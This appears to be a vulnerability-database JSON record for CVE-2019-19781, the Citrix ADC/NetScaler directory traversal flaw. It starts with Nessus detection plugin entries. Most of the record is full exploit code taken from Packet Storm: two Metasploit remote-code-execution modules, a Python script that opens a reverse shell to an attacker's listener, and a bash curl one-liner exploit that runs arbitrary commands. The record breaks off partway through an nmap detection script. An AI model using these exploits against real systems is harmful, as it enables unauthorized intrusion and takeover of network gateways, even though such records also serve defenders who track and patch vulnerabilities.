["CVE-2019-19781"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/o:citrix:netscaler_access_gateway_firmware"], "id": "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "href": "https://www.tenable.com/plugins/nessus/132752", "sourceData": "Binary data citrix_ssl_vpn_CVE-2019-19781.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-17T14:23:05", "description": "The remote Citrix ADC or Citrix NetScaler Gateway device is affected by an arbitrary code execution vulnerability. An unauthenticated, remote attacker may be able to leverage this vulnerability to perform arbitrary code execution on an affected host.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-22T00:00:00", "type": "nessus", "title": "Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-22T00:00:00", "cpe": ["cpe:/o:citrix:netscaler_access_gateway_firmware"], "id": "701262.PRM", "href": "https://www.tenable.com/plugins/nnm/701262", "sourceData": "Binary data 701262.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-24T15:08:17", "description": "The remote Citrix ADC or Citrix NetScaler Gateway device is affected by an arbitrary code execution vulnerability.\nAn unauthenticated, remote attacker may be able to leverage this vulnerability to perform arbitrary code execution on an affected host.\n\nPlease refer to advisory CTX267027 for more information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-24T00:00:00", "type": "nessus", "title": "Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2023-01-19T00:00:00", "cpe": ["cpe:/o:citrix:netscaler_access_gateway_firmware"], "id": "CITRIX_NETSCALER_CTX267027.NASL", "href": "https://www.tenable.com/plugins/nessus/132397", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132397);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/19\");\n\n script_cve_id(\"CVE-2019-19781\");\n script_xref(name:\"IAVA\", value:\"2020-A-0001-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0122\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0742\");\n\n script_name(english:\"Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an arbitrary code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Citrix ADC or Citrix NetScaler Gateway device is affected by an arbitrary code execution vulnerability.\nAn unauthenticated, remote attacker may be able to leverage this vulnerability to perform arbitrary code execution on \nan affected host.\n\nPlease refer to advisory CTX267027 for more information.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.citrix.com/article/CTX267027\");\n script_set_attribute(attribute:\"solution\", value:\n\"For versions 10.5.x, 11.1.x, 12.0.x, 12.1.x and 13.0.x, upgrade to 10.5.70.12, 11.1.63.15, 12.0.63.13, 12.1.55.18 and \n13.0.47.24 respectively.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19781\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Citrix ADC (NetScaler) Directory Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:citrix:netscaler_access_gateway_firmware\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"citrix_netscaler_detect.nbin\");\n script_require_keys(\"Host/NetScaler/Detected\");\n\n exit(0);\n}\ninclude('vcf_extras_netscaler.inc');\n\nvar app_info = vcf::citrix_netscaler::get_app_info();\n\nvar constraints = [\n {'min_version': '10.5', 'fixed_version': '10.5.70.12', 'fixed_display': '10.5-70.12'},\n {'min_version': '11.1', 'fixed_version': '11.1.63.15', 'fixed_display': '11.1-63.15'},\n {'min_version': '12.0', 'fixed_version': '12.0.63.13', 'fixed_display': '12.0-63.13'},\n {'min_version': '12.1', 'fixed_version': '12.1.55.18', 'fixed_display': '12.1-55.18'},\n {'min_version': '13.0', 'fixed_version': '13.0.47.24', 'fixed_display': '13.0-47.24'}\n];\n\nvcf::citrix_netscaler::check_version_and_report(\n app_info: app_info,\n constraints: constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-01-14T23:23:57", "description": "", "cvss3": {}, "published": "2020-01-14T00:00:00", "type": "packetstorm", "title": "Citrix ADC (NetScaler) Directory Traversal / Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-14T00:00:00", "id": "PACKETSTORM:155947", "href": "https://packetstormsecurity.com/files/155947/Citrix-ADC-NetScaler-Directory-Traversal-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Citrix ADC (NetScaler) Directory Traversal RCE', \n'Description' => %q{ \nThis module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka \nNetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload. \n}, \n'Author' => [ \n'Project Zero India', 'TrustedSec', # PoCs \n'mekhalleh (RAMELLA S\u00e9bastien)' # Module (https://www.pirates.re/) \n], \n'References' => [ \n['CVE', '2019-19781'], \n['EDB', '47901'], \n['EDB', '47902'], \n['URL', 'https://support.citrix.com/article/CTX267027/'], \n['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'] \n], \n'DisclosureDate' => '2019-12-17', \n'License' => MSF_LICENSE, \n'Platform' => ['python', 'unix'], \n'Arch' => [ARCH_PYTHON, ARCH_CMD], \n'Privileged' => false, \n'Targets' => [ \n['Python', \n'Platform' => 'python', \n'Arch' => ARCH_PYTHON, \n'Type' => :python, \n'DefaultOptions' => {'PAYLOAD' => 'python/meterpreter/reverse_tcp'} \n], \n['Unix Command', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_command, \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/scanner/http/citrix_dir_traversal', \n'HttpClientTimeout' => 3.5 \n}, \n'Notes' => { \n'AKA' => ['Shitrix'], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \nOptBool.new('ForceExploit', [false, 'Override check result', false]) \n]) \nend \n \ndef cmd_unix_generic? \ndatastore['PAYLOAD'] == 'cmd/unix/generic' \nend \n \ndef exploit \nunless datastore['ForceExploit'] \ncase check \nwhen CheckCode::Vulnerable \nprint_good('The target appears to be vulnerable') \nwhen CheckCode::Safe \nfail_with(Failure::NotVulnerable, 'The target does not appear to be vulnerable') \nelse \nfail_with(Failure::Unknown, 'The target vulnerability state is unknown') \nend \nend \n \nprint_status(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\") \nvprint_status(\"Generated payload: #{payload.encoded}\") \n \ncase target['Type'] \nwhen :python \nexecute_command(%(/var/python/bin/python2 -c \"#{payload.encoded}\")) \nwhen :unix_command \nif (res = execute_command(payload.encoded)) && cmd_unix_generic? \nprint_line(res.get_html_document.text.gsub(/undef error - Attempt to bless.*/m, '')) \nend \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nfilename = rand_text_alpha(8..42) \nnonce = rand_text_alpha(8..42) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'), \n'headers' => { \n'NSC_USER' => \"../../../netscaler/portal/templates/#{filename}\", \n'NSC_NONCE' => nonce \n}, \n'vars_post' => { \n'url' => rand_text_alpha(8..42), \n'title' => \"[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]\" \n} \n) \n \nunless res && res.code == 200 \nprint_error('No response to POST newbm.pl request') \nreturn \nend \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, \"/vpn/../vpns/portal/#{filename}.xml\"), \n'headers' => { \n'NSC_USER' => rand_text_alpha(8..42), \n'NSC_NONCE' => nonce \n}, \n'partial' => true \n) \n \nunless res && res.code == 200 \nprint_warning(\"No response to GET #{filename}.xml request\") \nend \n \nregister_files_for_cleanup( \n\"/netscaler/portal/templates/#{filename}.xml\", \n\"/var/tmp/netscaler/portal/templates/#{filename}.xml.ttc2\" \n) \n \nres \nend \n \ndef chr_payload(cmd) \ncmd.each_char.map { |c| \"chr(#{c.ord})\" }.join('.') \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155947/citrix_dir_traversal_rce.rb.txt"}, {"lastseen": "2020-01-13T22:40:41", "description": "", "cvss3": {}, "published": "2020-01-13T00:00:00", "type": "packetstorm", "title": "Citrix Application Delivery Controller / Gateway 10.5 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-13T00:00:00", "id": "PACKETSTORM:155930", "href": "https://packetstormsecurity.com/files/155930/Citrix-Application-Delivery-Controller-Gateway-10.5-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Citrix ADC Remote Code Execution', \n'Description' => %q( \nAn issue was discovered in Citrix Application Delivery Controller (ADC) \nand Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. \n), \n'Author' => [ \n'RAMELLA S\u00e9bastien' # https://www.pirates.re/ \n], \n'References' => [ \n['CVE', '2019-19781'], \n['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'], \n['EDB', '47901'], \n['EDB', '47902'] \n], \n'DisclosureDate' => '2019-12-17', \n'License' => MSF_LICENSE, \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD, \n'Privileged' => true, \n'Payload' => { \n'Compat' => { \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl meterpreter' \n} \n}, \n'Targets' => [ \n['Unix (remote shell)', \n'Type' => :cmd_shell, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_perl', \n'DisablePayloadHandler' => 'false' \n} \n], \n['Unix (command-line)', \n'Type' => :cmd_generic, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/generic', \n'DisablePayloadHandler' => 'true' \n} \n], \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptAddress.new('RHOST', [true, 'The target address']) \n]) \n \nregister_advanced_options([ \nOptBool.new('ForceExploit', [false, 'Override check result', false]) \n]) \n \nderegister_options('RHOSTS') \nend \n \ndef execute_command(command, opts = {}) \nfilename = Rex::Text.rand_text_alpha(16) \nnonce = Rex::Text.rand_text_alpha(6) \n \nrequest = { \n'method' => 'POST', \n'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'), \n'headers' => { \n'NSC_USER' => '../../../netscaler/portal/templates/' + filename, \n'NSC_NONCE' => nonce \n}, \n'vars_post' => { \n'url' => 'http://127.0.0.1', \n'title' => \"[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]\", \n'desc' => 'desc', \n'UI_inuse' => 'RfWeb' \n}, \n'encode_params' => false \n} \n \nbegin \nreceived = send_request_cgi(request) \nrescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN \nprint_error('Unable to connect on the remote target.') \nend \nreturn false unless received \n \nif received.code == 200 \nvprint_status(\"#{received.get_html_document.text}\") \nsleep 2 \n \nrequest = { \n'method' => 'GET', \n'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'), \n'headers' => { \n'NSC_USER' => nonce, \n'NSC_NONCE' => nonce \n} \n} \n \n## Trigger to gain exploitation. \nbegin \nsend_request_cgi(request) \nreceived = send_request_cgi(request) \nrescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN \nprint_error('Unable to connect on the remote target.') \nend \nreturn false unless received \nreturn received \nend \n \nreturn false \nend \n \ndef get_chr_payload(command) \nchr_payload = command \ni = chr_payload.length \n \noutput = \"\" \nchr_payload.each_char do | c | \ni = i - 1 \noutput << \"chr(\" << c.ord.to_s << \")\" \nif i != 0 \noutput << \" . \" \nend \nend \n \nreturn output \nend \n \ndef check \nbegin \nreceived = send_request_cgi( \n\"method\" => \"GET\", \n\"uri\" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf') \n) \nrescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN \nprint_error('Unable to connect on the remote target.') \nend \n \nif received && received.code != 200 \nreturn Exploit::CheckCode::Safe \nend \nreturn Exploit::CheckCode::Vulnerable \nend \n \ndef exploit \nunless check.eql? Exploit::CheckCode::Vulnerable \nunless datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'The target is not exploitable.') \nend \nelse \nprint_good('The target appears to be vulnerable.') \nend \n \ncase target['Type'] \nwhen :cmd_generic \nprint_status(\"Sending #{datastore['PAYLOAD']} command payload\") \nvprint_status(\"Generated command payload: #{payload.encoded}\") \n \nreceived = execute_command(payload.encoded) \nif (received) && (datastore['PAYLOAD'] == \"cmd/unix/generic\") \nprint_warning('Dumping command output in parsed http response') \nprint_good(\"#{received.get_html_document.text}\") \nelse \nprint_warning('Empty response, no command output') \nreturn \nend \n \nwhen :cmd_shell \nprint_status(\"Sending #{datastore['PAYLOAD']} command payload\") \nvprint_status(\"Generated command payload: #{payload.encoded}\") \n \nexecute_command(payload.encoded) \nend \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155930/citrix-exec.rb.txt"}, {"lastseen": "2020-01-13T22:40:41", "description": "", "cvss3": {}, "published": "2020-01-11T00:00:00", "type": "packetstorm", "title": "Citrix Application Delivery Controller / Gateway Remote Code Execution / Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "PACKETSTORM:155905", "href": "https://packetstormsecurity.com/files/155905/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution-Traversal.html", "sourceData": "`#!/usr/bin/python3 \n# \n# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 \n# \n# You only need a listener like netcat to catch the shell. \n# \n# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White \n# \n# Tool Written by: Rob Simon and David Kennedy \n \nimport requests \nimport urllib3 \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings \nimport random \nimport string \nimport time \nfrom random import randint \nimport argparse \nimport sys \n \n# random string generator \ndef randomString(stringLength=10): \nletters = string.ascii_lowercase \nreturn ''.join(random.choice(letters) for i in range(stringLength)) \n \n# our random string for filename - will leave artifacts on system \nfilename = randomString() \nrandomuser = randomString() \n \n# generate random number for the nonce \nnonce = randint(5, 15) \n \n# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script \n# note that the file location will be in /netscaler/portal/templates/filename.xml \ndef stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport): \n \n# encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC) \nencoded = \"\" \ni=0 \ntext = (\"\"\"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\"\"\" % (attackerip, attackerport)) \nwhile i < len(text): \nencoded = encoded + \"chr(\"+str(ord(text[i]))+\") . \" \ni += 1 \nencoded = encoded[:-3] \npayload=\"[% template.new({'BLOCK'='print readpipe(\" + encoded + \")'})%]\" \nheaders = ( \n{ \n'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0', \n'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename), \n'NSC_NONCE' : '%s' % (nonce), \n}) \n \ndata = ( \n{ \n\"url\" : \"127.0.0.1\", \n\"title\" : payload, \n\"desc\" : \"desc\", \n\"UI_inuse\" : \"a\" \n}) \n \nurl = (\"https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl\" % (victimip, victimport)) \nrequests.post(url, data=data, headers=headers, verify=False) \n \n# this is our second stage that triggers the exploit for us \ndef stage2(filename, randomuser, nonce, victimip, victimport): \nheaders = ( \n{ \n'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0', \n'NSC_USER' : '%s' % (randomuser), \n'NSC_NONCE' : '%s' % (nonce), \n}) \n \nrequests.get(\"https://%s:%s/vpn/../vpns/portal/%s.xml\" % (victimip, victimport, filename), headers=headers, verify=False) \n \n \n# start our main code to execute \nprint(''' \n \n.o oOOOOOOOo OOOo \nOb.OOOOOOOo OOOo. oOOo. .adOOOOOOO \nOboO\"\"\"\"\"\"\"\"\"\"\"\".OOo. .oOOOOOo. OOOo.oOOOOOo..\"\"\"\"\"\"\"\"\"'OO \nOOP.oOOOOOOOOOOO \"POOOOOOOOOOOo. `\"OOOOOOOOOP,OOOOOOOOOOOB' \n`O'OOOO' `OOOOo\"OOOOOOOOOOO` .adOOOOOOOOO\"oOOO' `OOOOo \n.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO \nOOOOO '\"OOOOOOOOOOOOOOOO\"` oOO \noOOOOOba. .adOOOOOOOOOOba .adOOOOo. \noOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO \nOOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO\"` '\"OOOOOOOOOOOOO.OOOOOOOOOOOOOO \n\"OOOO\" \"YOoOOOOMOIONODOO\"` . '\"OOROAOPOEOOOoOY\" \"OOO\" \nY 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` \n: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . \n. oOOP\"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO\"OOo \n'%o OOOO\"%OOOO%\"%OOOOO\"OOOOOO\"OOO': \n`$\" `OOOO' `O\"Y ' `OOOO' o . \n. . OP\" : o . \n: \n \nCitrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 \nTool Written by: Rob Simon and Dave Kennedy \nContributions: The TrustedSec Team \nWebsite: https://www.trustedsec.com \nINFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ \n \nThis tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used \nto append files in an XML format to the victim machine. This in turn allows for remote code execution. \n \nBe sure to cleanup these two file locations: \n/var/tmp/netscaler/portal/templates/ \n/netscaler/portal/templates/ \n \nUsage: \n \npython citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\\n''') \n \n# parse our commands \nparser = argparse.ArgumentParser() \nparser.add_argument(\"target\", help=\"the vulnerable server with Citrix (defaults https)\") \nparser.add_argument(\"targetport\", help=\"the target server web port (normally on 443)\") \nparser.add_argument(\"attackerip\", help=\"the attackers reverse listener IP address\") \nparser.add_argument(\"attackerport\", help=\"the attackersa reverse listener port\") \nargs = parser.parse_args() \nprint(\"[*] Firing STAGE1 POST request to create the XML template exploit to disk...\") \nprint(\"[*] Saving filename as %s.xml on the victim machine...\" % (filename)) \n# trigger our first post \nstage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport) \nprint(\"[*] Sleeping for 2 seconds to ensure file is written before we call it...\") \ntime.sleep(2) \nprint(\"[*] Triggering GET request for the newly created file with a listener waiting...\") \nprint(\"[*] Shell should now be in your listener... enjoy. Keep this window open..\") \nprint(\"[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/\") \n# trigger our second post \nstage2(filename, randomuser, nonce, args.target, args.targetport) \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155905/citrix-traversalexec.txt"}, {"lastseen": "2020-01-13T22:40:41", "description": "", "cvss3": {}, "published": "2020-01-11T00:00:00", "type": "packetstorm", "title": "Citrix Application Delivery Controller / Gateway Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "PACKETSTORM:155904", "href": "https://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html", "sourceData": "`#!/bin/bash \n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781 \n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a' \n# Release Date : 11/01/2020 \n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia \necho \"================================================================================= \n___ _ _ ____ ___ _ _ \n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _ \n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' | \n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_| \n|__/ CVE-2019-19781 \n=================================================================================\" \n############################## \nif [ -z \"$1\" ]; \nthen \necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n' \nexit; \nfi \nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1); \ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is \necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is \necho -ne \"Command Output :\\n\" \ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155904/citrixadcg-exec.txt"}, {"lastseen": "2020-01-16T22:49:44", "description": "", "cvss3": {}, "published": "2020-01-16T00:00:00", "type": "packetstorm", "title": "Citrix ADC / Gateway Path Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-16T00:00:00", "id": "PACKETSTORM:155972", "href": "https://packetstormsecurity.com/files/155972/Citrix-ADC-Gateway-Path-Traversal.html", "sourceData": "`# Exploit Title: Path Traversal in Citrix Application Delivery Controller \n(ADC) and Gateway. \n# Date: 17-12-2019 \n# CVE: CVE-2019-19781 \n# Vulenrability: Path Traversal \n# Vulnerablity Discovery: Mikhail Klyuchnikov \n# Exploit Author: Dhiraj Mishra \n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0 \n# Vendor Homepage: https://www.citrix.com/ \n# References: https://support.citrix.com/article/CTX267027 \n# https://github.com/nmap/nmap/pull/1893 \n \nlocal http = require \"http\" \nlocal stdnse = require \"stdnse\" \nlocal shortport = require \"shortport\" \nlocal table = require \"table\" \nlocal string = require \"string\" \nlocal vulns = require \"vulns\" \nlocal nmap = require \"nmap\" \nlocal io = require \"io\" \n \ndescription = [[ \nThis NSE script checks whether the traget server is vulnerable to \nCVE-2019-19781 \n]] \n--- \n-- @usage \n-- nmap --script https-citrix-path-traversal -p <port> <host> \n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args \noutput='file.txt' \n-- @output \n-- PORT STATE SERVICE \n-- 443/tcp open http \n-- | CVE-2019-19781: \n-- | Host is vulnerable to CVE-2019-19781 \n-- @changelog \n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj) \n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__) \n-- @xmloutput \n-- <table key=\"NMAP-1\"> \n-- <elem key=\"title\">Citrix ADC 